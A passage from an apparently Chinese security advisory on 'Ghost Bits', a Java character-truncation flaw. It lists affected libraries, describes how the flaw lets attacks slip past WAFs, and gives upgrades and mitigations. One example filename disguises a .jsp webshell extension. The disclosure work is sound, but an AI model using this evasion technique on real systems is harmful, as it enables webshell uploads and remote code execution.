16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf="">1.陪sp</span></code></pre><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">服务器保存时却可能变成：</span></p><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf="">1.jsp</span></code></pre><h2 data-cacheurl="" data-remoteid="" style="box-sizing: border-box;margin: 30px 0px 15px;color: rgba(0, 0, 0, 0.85);font-weight: 500;cursor: pointer;padding: 0px;background: none center center / 63px no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;justify-content: center;line-height: 1.5em;overflow: unset; text-align: left;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=0d173448&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F7xtecWUgCRwAL0vLiawwtexXib0WjS0liaI3FMUx7TyFicnedK0YSSrCHibP0HSVhNsyzmeliaJDBxM4EF3Tr2V3nkBQdFvzgmTUkJ0LKLPGkC7NI%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><span style=" box-sizing: border-box;cursor: pointer;font-size: 18px;color: rgb(72, 179, 120);line-height: 2.4em;letter-spacing: 0em;margin: 38px 0px 10px;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;align-items: unset;background: none 0% 0% / auto no-repeat scroll padding-box border-box transparent;box-shadow: none;content: unset;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: 38px;justify-content: unset;overflow: unset;padding: 0px; text-align: center;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset; "><span leaf="">受影响组件</span></span></h2><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">以下组件已被确认受 Ghost Bits 影响：</span></p><p style="box-sizing: border-box;cursor: pointer;margin: 0px;padding: 0px;overflow-x: auto;color: rgb(0, 0, 0);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><table style="box-sizing: border-box;border-collapse: collapse;cursor: pointer;display: table;text-align: left;"><thead><tr style="box-sizing: border-box;cursor: pointer;"><th style="box-sizing: border-box;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.5em;letter-spacing: 0.02em;text-align: left;font-weight: bold;background: rgb(240, 240, 240) left top no-repeat;height: auto;border-style: solid;border-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;padding: 5px 10px;min-width: 85px;"><p><span leaf="">组件</span></p></th><th style="box-sizing: border-box;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.5em;letter-spacing: 0.02em;text-align: left;font-weight: bold;background: rgb(240, 240, 240) left top no-repeat;height: auto;border-style: solid;border-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;padding: 5px 10px;min-width: 85px;"><p><span leaf="">漏洞类型</span></p></th></tr></thead><tbody><tr style="box-sizing: border-box;cursor: pointer;color: rgb(63, 63, 63);background: none left top / auto no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;"><td style="box-sizing: border-box;cursor: pointer;padding: 5px 10px;min-width: 85px;border-style: solid;border-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;"><p><span leaf="">Apache Commons BCEL</span></p></td><td style="box-sizing: border-box;cursor: pointer;padding: 5px 10px;min-width: 85px;border-style: solid;border-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;"><p><span leaf="">WAF 绕过 / 反序列化 RCE</span></p></td></tr><tr style="box-sizing: border-box;cursor: pointer;color: rgb(0, 0, 0);background: none left top / auto no-repeat scroll padding-box border-box rgb(248, 248, 248);width: auto;height: auto;"><td style="box-sizing: border-box;cursor: pointer;padding: 5px 10px;min-width: 85px;border-style: solid;border-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;"><p><span leaf="">Jackson Databind</span></p></td><td style="box-sizing: border-box;cursor: pointer;padding: 5px 10px;min-width: 85px;border-style: solid;border-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;"><p><span leaf="">WAF 绕过 / SQL 注入</span></p></td></tr><tr style="box-sizing: border-box;cursor: pointer;color: rgb(63, 63, 63);background: none left top / auto no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;"><td style="box-sizing: border-box;cursor: pointer;padding: 5px 10px;min-width: 85px;border-style: solid;border-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;"><p><span leaf="">Fastjson</span></p></td><td style="box-sizing: border-box;cursor: pointer;padding: 5px 10px;min-width: 85px;border-style: solid;border-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;"><p><span leaf="">WAF 绕过 / 反序列化 RCE</span></p></td></tr><tr style="box-sizing: border-box;cursor: pointer;color: rgb(0, 0, 0);background: none left top / auto no-repeat scroll padding-box border-box rgb(248, 248, 248);width: auto;height: auto;"><td style="box-sizing: border-box;cursor: pointer;padding: 5px 10px;min-width: 85px;border-style: solid;border-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;"><p><span leaf="">Apache Tomcat</span></p></td><td style="box-sizing: border-box;cursor: pointer;padding: 5px 10px;min-width: 85px;border-style: solid;border-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;"><p><span leaf="">文件上传绕过（Webshell）</span></p></td></tr><tr style="box-sizing: border-box;cursor: pointer;color: rgb(63, 63, 63);background: none left top / auto no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;"><td style="box-sizing: border-box;cursor: pointer;padding: 5px 10px;min-width: 85px;border-style: solid;border-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;"><p><span leaf="">Spring Framework</span></p></td><td style="box-sizing: border-box;cursor: pointer;padding: 5px 10px;min-width: 85px;border-style: solid;border-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;"><p><span leaf="">URL 解码绕过 / 路径穿越</span></p></td></tr><tr style="box-sizing: border-box;cursor: pointer;color: rgb(0, 0, 0);background: none left top / auto no-repeat scroll padding-box border-box rgb(248, 248, 248);width: auto;height: auto;"><td style="box-sizing: border-box;cursor: pointer;padding: 5px 10px;min-width: 85px;border-style: solid;border-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;"><p><span leaf="">Jetty</span></p></td><td style="box-sizing: border-box;cursor: pointer;padding: 5px 10px;min-width: 85px;border-style: solid;border-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;"><p><span leaf="">URL 解码绕过 / CRLF 注入</span></p></td></tr><tr style="box-sizing: border-box;cursor: pointer;color: rgb(63, 63, 63);background: none left top / auto no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;"><td style="box-sizing: border-box;cursor: pointer;padding: 5px 10px;min-width: 85px;border-style: solid;border-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;"><p><span leaf="">Undertow</span></p></td><td style="box-sizing: border-box;cursor: pointer;padding: 5px 10px;min-width: 85px;border-style: solid;border-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;"><p><span leaf="">URL 解码绕过</span></p></td></tr><tr style="box-sizing: border-box;cursor: pointer;color: rgb(0, 0, 0);background: none left top / auto no-repeat scroll padding-box border-box rgb(248, 248, 248);width: auto;height: auto;"><td style="box-sizing: border-box;cursor: pointer;padding: 5px 10px;min-width: 85px;border-style: solid;border-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;"><p><span leaf="">Vert.x</span></p></td><td style="box-sizing: border-box;cursor: pointer;padding: 5px 10px;min-width: 85px;border-style: solid;border-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;"><p><span leaf="">URL 解码绕过</span></p></td></tr><tr style="box-sizing: border-box;cursor: pointer;color: rgb(63, 63, 63);background: none left top / auto no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;"><td style="box-sizing: border-box;cursor: pointer;padding: 5px 10px;min-width: 85px;border-style: solid;border-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;"><p><span leaf="">Angus Mail</span></p></td><td style="box-sizing: border-box;cursor: pointer;padding: 5px 10px;min-width: 85px;border-style: solid;border-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;"><p><span leaf="">SMTP 注入</span></p></td></tr><tr style="box-sizing: border-box;cursor: pointer;color: rgb(0, 0, 0);background: none left top / auto no-repeat scroll padding-box border-box rgb(248, 248, 248);width: auto;height: auto;"><td style="box-sizing: border-box;cursor: pointer;padding: 5px 10px;min-width: 85px;border-style: solid;border-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;"><p><span leaf="">Apache HttpClient ≤ 4.5.9</span></p></td><td style="box-sizing: border-box;cursor: pointer;padding: 5px 10px;min-width: 85px;border-style: solid;border-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;"><p><span leaf="">HTTP 请求走私（HTTPCLIENT-1974/1978）</span></p></td></tr><tr style="box-sizing: border-box;cursor: pointer;color: rgb(63, 63, 63);background: none left top / auto no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;"><td style="box-sizing: border-box;cursor: pointer;padding: 5px 10px;min-width: 85px;border-style: solid;border-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;"><p><span leaf="">ActiveJ</span></p></td><td style="box-sizing: border-box;cursor: pointer;padding: 5px 10px;min-width: 85px;border-style: solid;border-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;"><p><span leaf="">HTTP CRLF 注入</span></p></td></tr><tr style="box-sizing: border-box;cursor: pointer;color: rgb(0, 0, 0);background: none left top / auto no-repeat scroll padding-box border-box rgb(248, 248, 248);width: auto;height: auto;"><td style="box-sizing: border-box;cursor: pointer;padding: 5px 10px;min-width: 85px;border-style: solid;border-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;"><p><span leaf="">Lettuce（Redis 客户端）</span></p></td><td style="box-sizing: border-box;cursor: pointer;padding: 5px 10px;min-width: 85px;border-style: solid;border-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;"><p><span leaf="">Redis 命令注入</span></p></td></tr><tr style="box-sizing: border-box;cursor: pointer;color: rgb(63, 63, 63);background: none left top / auto no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;"><td style="box-sizing: border-box;cursor: pointer;padding: 5px 10px;min-width: 85px;border-style: solid;border-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;"><p><span leaf="">Jodd</span></p></td><td style="box-sizing: border-box;cursor: pointer;padding: 5px 10px;min-width: 85px;border-style: solid;border-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;"><p><span leaf="">路径穿越</span></p></td></tr><tr style="box-sizing: border-box;cursor: pointer;color: rgb(0, 0, 0);background: none left top / auto no-repeat scroll padding-box border-box rgb(248, 248, 248);width: auto;height: auto;"><td style="box-sizing: border-box;cursor: pointer;padding: 5px 10px;min-width: 85px;border-style: solid;border-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;"><p><span leaf="">XMLWriter</span></p></td><td style="box-sizing: border-box;cursor: pointer;padding: 5px 10px;min-width: 85px;border-style: solid;border-width: 1px;border-color: rgba(204, 204, 204, 0.4);border-radius: 0px;"><p><span leaf="">XML 标签注入</span></p></td></tr></tbody></table></p><h2 data-cacheurl="" data-remoteid="" style="box-sizing: border-box;margin: 30px 0px 15px;color: rgba(0, 0, 0, 0.85);font-weight: 500;cursor: pointer;padding: 0px;background: none center center / 63px no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;justify-content: center;line-height: 1.5em;overflow: unset; text-align: left;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=c67e29e2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F7xtecWUgCRyhVJqv0ib0Cvg6h9ceNqkdMib9csDTp2RKD4HaK3ukh9Ic9CwMkwtib9CeYOXt6Bmb9tDJNvHIcgqd1XCxUTvAHM2J3Ko6hhhZss%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><span style=" box-sizing: border-box;cursor: pointer;font-size: 18px;color: rgb(72, 179, 120);line-height: 2.4em;letter-spacing: 0em;margin: 38px 0px 10px;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;align-items: unset;background: none 0% 0% / auto no-repeat scroll padding-box border-box transparent;box-shadow: none;content: unset;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: 38px;justify-content: unset;overflow: unset;padding: 0px; text-align: center;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset; "><span leaf="">造成的影响</span></span></h2><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">WAF/IDS 全面绕过： 攻击者通过 Ghost Bits 变形 Payload 可绕过绝大多数现有基于规则的 WAF 检测，使已有安全防护形同虚设。</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">触发多类高危漏洞：</span></p><ul style="box-sizing: border-box;margin: 8px 0px;cursor: pointer;list-style-type: disc;padding: 0px 0px 0px 25px;color: rgb(0, 0, 0);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="box-sizing: border-box;cursor: pointer;"><p style="box-sizing: border-box;cursor: pointer;margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;font-weight: normal;"><span leaf="">SQL 注入：Jackson charToHex（ch &amp; 255）截断，SQL 注入 Payload 隐写于 Unicode 字符中，WAF 无告警，后端还原并执行。</span></p></li><li style="box-sizing: border-box;cursor: pointer;"><p style="box-sizing: border-box;cursor: pointer;margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;font-weight: normal;"><span leaf="">反序列化 RCE：BCEL ClassLoader 解码、fastjson \u/ \x 转义均存在 Ghost Bits，可绕过 WAF 触发反序列化远程代码执行。</span></p></li><li style="box-sizing: border-box;cursor: pointer;"><p style="box-sizing: border-box;cursor: pointer;margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;font-weight: normal;"><span leaf="">文件上传绕过：Tomcat RFC2231Utility 处理文件名时截断高位，可将 .jsp 伪装为非敏感 Unicode 字符，绕过 WAF 上传 Webshell。</span></p></li><li style="box-sizing: border-box;cursor: pointer;"><p style="box-sizing: border-box;cursor: pointer;margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;font-weight: normal;"><span leaf="">路径穿越 / 认证绕过：Spring、Jetty、Undertow、Vert.x 等框架 URL 解码路径存在 Ghost Bits，可绕过 WAF 实现目录穿越；Openfire CVE-2023-32315 可借此绕过 WAF 防护直接利用。</span></p></li><li style="box-sizing: border-box;cursor: pointer;"><p style="box-sizing: border-box;cursor: pointer;margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;font-weight: normal;"><span leaf="">已知高危 CVE WAF 绕过：GeoServer CVE-2024-36401（CVSS 9.8）、Spring4Shell（CVE-2022-22965）等漏洞的现有 WAF 防护均可被 Ghost Bits 变体 Payload 绕过，直接触发 RCE。</span></p></li><li style="box-sizing: border-box;cursor: pointer;"><p style="box-sizing: border-box;cursor: pointer;margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;font-weight: normal;"><span leaf="">SMTP 注入：Angus Mail 等邮件库存在 Ghost Bits，可将隐写 CRLF 序列还原为换行符，触发 SMTP 注入，实现邮件劫持或业务逻辑绕过（已在 Jira、Confluence 上复现）。</span></p></li><li style="box-sizing: border-box;cursor: pointer;"><p style="box-sizing: border-box;cursor: pointer;margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;font-weight: normal;"><span leaf="">HTTP 请求走私 / XSS：Apache HttpClient（≤ 4.5.9）、JDK 原生 HttpServer 等组件同样受 Ghost Bits CRLF 影响。</span></p></li></ul><h2 data-cacheurl="" data-remoteid="" style="box-sizing: border-box;margin: 30px 0px 15px;color: rgba(0, 0, 0, 0.85);font-weight: 500;cursor: pointer;padding: 0px;background: none center center / 63px no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;justify-content: center;line-height: 1.5em;overflow: unset; text-align: left;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=92fdc048&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F7xtecWUgCRwibEiclPDw2CLpHpzUSvK73uPKpdZlyFAEpl1FVG7yiaMCvzHtzV879sWic7X52YJZlcFiczuEATBuv4dYbB0WNF32N3k5FxJ4T398%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><span style=" box-sizing: border-box;cursor: pointer;font-size: 18px;color: rgb(72, 179, 120);line-height: 2.4em;letter-spacing: 0em;margin: 38px 0px 10px;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;align-items: unset;background: none 0% 0% / auto no-repeat scroll padding-box border-box transparent;box-shadow: none;content: unset;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: 38px;justify-content: unset;overflow: unset;padding: 0px; text-align: center;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset; "><span leaf="">解决修复方案</span></span></h2><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">请关注上述各受影响组件的官方 Security Advisory，升级至已修复版本。</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">重点关注：</span></p><ul style="box-sizing: border-box;margin: 8px 0px;cursor: pointer;list-style-type: disc;padding: 0px 0px 0px 25px;color: rgb(0, 0, 0);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="box-sizing: border-box;cursor: pointer;"><p style="box-sizing: border-box;cursor: pointer;margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;font-weight: normal;"><span leaf="">Apache Commons BCEL：升级至 6.12.0 及以上版本 Fastjson：升级至 2.x 系列最新版本</span></p></li><li style="box-sizing: border-box;cursor: pointer;"><p style="box-sizing: border-box;cursor: pointer;margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;font-weight: normal;"><span leaf="">Apache HttpClient：升级至 4.5.10 及以上版本，或迁移至 HttpClient 5.x</span></p></li><li style="box-sizing: border-box;cursor: pointer;"><p style="box-sizing: border-box;cursor: pointer;margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;font-weight: normal;"><span leaf="">GeoServer：升级至 2.28.3 及以上版本</span></p></li><li style="box-sizing: border-box;cursor: pointer;"><p style="box-sizing: border-box;cursor: pointer;margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;font-weight: normal;"><span leaf="">Openfire：升级至 5.0.4 及以上版本</span></p></li></ul><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">临时缓解方案:</span></p><ul style="box-sizing: border-box;margin: 8px 0px;cursor: pointer;list-style-type: disc;padding: 0px 0px 0px 25px;color: rgb(0, 0, 0);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="box-sizing: border-box;cursor: pointer;"><p style="box-sizing: border-box;cursor: pointer;margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;font-weight: normal;"><span leaf="">WAF 规则：现有基于字符串特征的 WAF 规则对 Ghost Bits 变形 Payload 防护效果有限，建议在解码层面进行语义检测，或引入 Unicode 规范化预处理后再执行规则匹配。</span></p></li><li style="box-sizing: border-box;cursor: pointer;"><p style="box-sizing: border-box;cursor: pointer;margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;font-weight: normal;"><span leaf="">代码层面：排查自研代码中 (byte)ch、ch &amp; 0xFF、baos.write(ch)、DataOutputStream<a class="wx_topic_link" topic-id="mojag53s-rwwtvc" style="color: #576B95 !important;" data-topic="1" data-recommend="">#writeBytes</a>() 等写法，改为使用 String.getBytes(StandardCharsets.UTF_8) 等明确指定编码的方式。</span></p></li><li style="box-sizing: border-box;cursor: pointer;"><p style="box-sizing: border-box;cursor: pointer;margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;font-weight: normal;"><span leaf="">输入验证：在输入校验阶段对关键字段（文件名、邮件地址、URL 参数、JSON 键名等）严格过滤非 ASCII 字符或进行 Unicode 归一化（NFC/NFKC）处理。</span></p></li><li style="box-sizing: border-box;cursor: pointer;"><p 